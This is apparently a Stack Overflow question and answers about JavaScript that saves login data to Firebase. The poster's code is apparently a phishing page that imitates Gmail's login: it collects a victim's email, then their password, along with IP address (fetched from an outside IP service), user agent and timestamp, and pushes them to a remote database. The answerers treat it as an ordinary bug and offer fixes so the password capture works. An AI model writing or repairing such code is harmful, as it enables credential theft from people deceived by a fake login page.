# Unable to Save Data to Firebase

Tags: javascript, html, firebase, firebase-realtime-database

I have three pages.
Page 1 gets the Email/ Username of user (Same like Gmail).
Page 2 gets password and redirects to successful login page.

Issue i am facing:
I am able to get user-agents , ip , timestamp when i enter email in page 1 and redirected to page 2. All values are successfully saved in DB.
Now in page 2 i enter password but it doesn't get saved in DB.
Following are Result in DB:

```
ip: 
"xxx.xxx.xxx.xx"
mobile: 
"vvccc"
timestamp: 
"22/2/2018 16:23:56:966"
useragent: 
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleW..."
```

```js
firebase.initializeApp(config);
var userAgent = window.navigator.userAgent;
var req = new XMLHttpRequest();
var ip;
var timestamp;
req.onload = function () {

    var d = new Date();
    var dateformat = d.toTimeString();
    dateformat = dateformat.split(' ')[0];


    ip = JSON.parse(req.response).ip;
    timestamp = d.getDate() + '/' + d.getMonth() + '/' + d.getFullYear() + ' ' + dateformat + ':' + d.getMilliseconds();
    //savedata(ip,userAgent, d.getDate()+'/'+ d.getMonth()+'/'+ d.getFullYear()+' '+dateformat+':'+ d.getMilliseconds());
    console.log(ip + '  ' + userAgent + '  ' + dateformat);
    //Use ip asynchronously here
};

req.open("GET", "https://api.ipify.org/?format=json");
req.send();


var database = firebase.database();
var nextbutton = document.getElementById('Button1'); // Data from page 1 successfully reditected to page 2.
var pass = document.getElementById('Button2'); // Now from page 2 i redirected to page 3 , but I am unable to save its value in table.
var mobileno = document.getElementById('identifierId'); //page 1 textbox id
var password = document.getElementById('identifierId2'); //page 2 textbox id -> Unable to get its data

nextbutton.addEventListener('click', function () {
    //var d = new Date();
    //var dateformat = d.toTimeString();
    //dateformat = dateformat.split(' ')[0];

    //window.location.href = "http://stackoverflow.com";

    var ip = JSON.parse(req.response).ip;
    // savedata(ip, userAgent, d.getDate() + '/' + d.getMonth() + '/' + d.getFullYear() + ' ' + dateformat + ':' + d.getMilliseconds());
    console.log(ip + '  ' + userAgent);
    database.ref('/email').push({
        mobile: mobileno.value,
        ip: ip,
        useragent: userAgent,
        timestamp: timestamp

    }

        )

    console.log("meesage sent" + mobileno.value)
})

pass.addEventListener('click', function () {


    var ip = JSON.parse(req.response).ip;
    console.log(ip + '  ' + userAgent);
    database.ref('/email').push({
        passw: password.value

    }

        )
    console.log("meesage sent" + password.value)
})
```

Comment: Can you post your savedata() function?

Comment: i had pasted full code.

Comment: note that you have **passw: password.value** instead of: **pass: password.value**

Answer (score 0):

I'm not sure if this is the exact problem you have but I took a look at the docs (https://firebase.google.com/docs/reference/js/firebase.database.Reference).

**My assumption**
It seems that in **Step 1**, you already create a new object in the firebase database and want to update that object with the password later on.

Later on, you try to update that object but you are using the code for creating a new object. Therefore, it will not be created nor updated because an object with the same key already exists.
**You should update the object instead of creating another**

> Note: I never used firebase so I might be using it with the wrong identifiers etc but is is about the concept.

Here is a code example for updating the password. **UPDATED**

```
pass.addEventListener('click', function() {
    var ip = JSON.parse(req.response).ip;
    console.log(ip + '  ' + userAgent);

    /**
     * make sure you have user email to find the created tree
     * This is by the assumption that userEmail is the key from the email table
     */
    let userKey = mobelino.value;
    //Get the Account we just created
    let emailReference = database.ref('/email/' + userKey);
    //Update the password
    emailReference.set({
            pass: password
        })
        //On success
        .then(() => {
            console.log("Success");
        })
        //On error
        .catch(error => {
            console.log('Error: ' + error)
        });
});
```

Comment: I didn't want to update object. I want to create new object of password in database.

Comment: then check my other answer (maybe password needs to be password.value)

Comment: I updated my answer. Still applies, if you created the object in the email table then you should use set() instead of push()

Answer (score 0):

If my prvious answer was not the case then maybe you should try to get the value from html:

> Note the difference (pass: password | pass: password.value)

```
database.ref('/email').push({
        mobile: mobileno.value,
        ip: ip,
        useragent: userAgent,
        timestamp: timestamp,       


       //Before: pass: password
        pass: password.value

    }
```

Comment: I had edit my question, please review. As password is in another page so it has different button. pass.addEventListener('click', function () {